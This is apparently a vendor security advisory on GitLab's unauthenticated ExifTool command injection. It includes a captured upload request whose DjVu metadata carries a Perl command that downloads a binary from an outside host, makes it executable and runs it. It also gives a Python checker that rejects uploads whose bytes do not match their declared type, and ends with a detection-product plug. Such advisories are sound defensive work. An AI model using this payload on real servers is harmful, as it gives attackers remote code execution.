GitLab Unauthenticated Remote ExifTool Command Injection
- Nov 11, 2021
- 1 min read
Updated: Jul 1, 2022

Application Details
GitLab helps teams design, develop and securely manage code and project data from a single distributed version control system to enable rapid iteration and delivery of business value.
Vulnerability
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
Identification
Files uploaded with a jpg, jpeg or tiff extension are passed to ExifTool to strip any unauthorised tags. The problem is that ExifTool ignores the file extension and determines the file type from the content itself, so a file that is not a JPEG or TIFF at all (in the request below, a DjVu container uploaded under a .jpg name) is still parsed as its real format, and the metadata it carries is interpreted accordingly.
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg
Content-Transfer-Encoding: binary
AT&TFORM....DJVMDIRM..........F......... !..N........k.D.,q..I.n...."?FORM...^DJVUINFO...
......d...INCL....shared_anno.iff.BG44.....J..........7..*..BG44........BG44.....
FORM....DJVIANTa...P(metadata
(Copyright "\
" . qx#wget -qO /tmp/qhRKvWyG http://192.168.74.155:8080/SiG0LiTq2R;chmod +x /tmp/qhRKvWyG;/tmp/qhRKvWyG;rm -f /tmp/qhRKvWyG# . \
" b ") )

Detection
By turning this vulnerability into a traffic file and a matching rule, we are able to detect attempts to upload files whose content does not match the declared content type.
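The same mismatch between declared type and actual content can be checked server-side before an upload ever reaches ExifTool. The Python below is an added example and is neither Idappcom's signature 8021990 nor GitLab's code: it splits a multipart/form-data body into parts, reads the extension and Content-Type each part declares, sniffs the real type from the leading bytes (the JPEG, TIFF and DjVu "AT&TFORM" signatures are the standard magic values), and rejects any part where the three disagree. The multipart body and the part helper are constructed for the example, with the first part mimicking the request shown above: a DjVu header under a test.jpg filename.

```python
"""Magic-byte check for image uploads (added example, not GitLab's or Idappcom's code).
Rejects parts whose content does not match the declared extension and Content-Type."""

import re

# Standard leading-byte signatures for the types the page says reach ExifTool,
# plus DjVu, whose "AT&TFORM" header opens the request shown above.
MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/tiff": (b"II*\x00", b"MM\x00*"),
    "image/vnd.djvu": (b"AT&TFORM",),
}

# Which sniffed type each permitted extension must actually contain.
EXT_TO_TYPE = {"jpg": "image/jpeg", "jpeg": "image/jpeg",
               "tif": "image/tiff", "tiff": "image/tiff"}


def sniff_type(data: bytes):
    """Return the MIME type implied by the file's leading bytes, or None if unknown."""
    for mime, sigs in MAGIC.items():
        if any(data.startswith(s) for s in sigs):
            return mime
    return None


def parse_multipart(body: bytes, boundary: bytes):
    """Minimal multipart/form-data splitter: returns a list of (headers, data).
    Good enough for the example; production code should use a proper parser."""
    parts = []
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        chunk = chunk.lstrip(b"\r\n")
        head, _, data = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in head.split(b"\r\n"):
            name, _, value = line.decode("latin-1").partition(":")
            headers[name.strip().lower()] = value.strip()
        if data.endswith(b"\r\n"):           # CRLF that precedes the next boundary
            data = data[:-2]
        parts.append((headers, data))
    return parts


def filename_from_disposition(value: str):
    m = re.search(r'filename="([^"]*)"', value)
    return m.group(1) if m else None


def inspect_part(headers: dict, data: bytes) -> str:
    """Verdict for one part: 'ok', or a 'reject: ...' reason describing the mismatch."""
    filename = filename_from_disposition(headers.get("content-disposition", "")) or ""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    declared = headers.get("content-type", "").lower()
    expected = EXT_TO_TYPE.get(ext)
    actual = sniff_type(data)
    if expected is None:
        return f"reject: extension .{ext} not allowed"
    if actual is None:
        return "reject: unrecognised file content"
    if actual != expected or declared != expected:
        return f"reject: .{ext}/{declared} declared but content is {actual}"
    return "ok"


# ---- constructed sample request body -------------------------------------
BOUNDARY = b"----constructedboundary"


def make_part(filename: str, ctype: str, data: bytes) -> bytes:
    return (b"--" + BOUNDARY + b"\r\n"
            + f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'.encode()
            + f"Content-Type: {ctype}\r\n\r\n".encode()
            + data + b"\r\n")


SAMPLE_BODY = (
    make_part("test.jpg", "image/jpeg", b"AT&TFORM\x00\x00\x00\x40DJVM")   # DjVu under a .jpg name
    + make_part("ok.jpg", "image/jpeg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00")  # genuine JPEG header
    + make_part("scan.tiff", "image/tiff", b"II*\x00\x08\x00\x00\x00")        # genuine TIFF header
    + b"--" + BOUNDARY + b"--\r\n"
)


def scan_body(body: bytes = SAMPLE_BODY, boundary: bytes = BOUNDARY):
    """Return [(filename, verdict), ...] for every part in the body."""
    return [(filename_from_disposition(h.get("content-disposition", "")), inspect_part(h, d))
            for h, d in parse_multipart(body, boundary)]


if __name__ == "__main__":
    for name, verdict in scan_body():
        print(f"{name}: {verdict}")
```

Run as a script it prints one verdict per part; the DjVu-under-.jpg part is rejected while the two genuine images pass. The check is deliberately three-way (extension, declared Content-Type, sniffed content) because any one of them is attacker-controlled on its own; only the sniffed type is derived from the bytes ExifTool will actually parse.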
Coverage
Idappcom has created signature 8021990 along with a traffic file.
References
Traffic IQ
If you are concerned that your business may be at risk from this vulnerability or others, why not try out our Traffic IQ software, which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
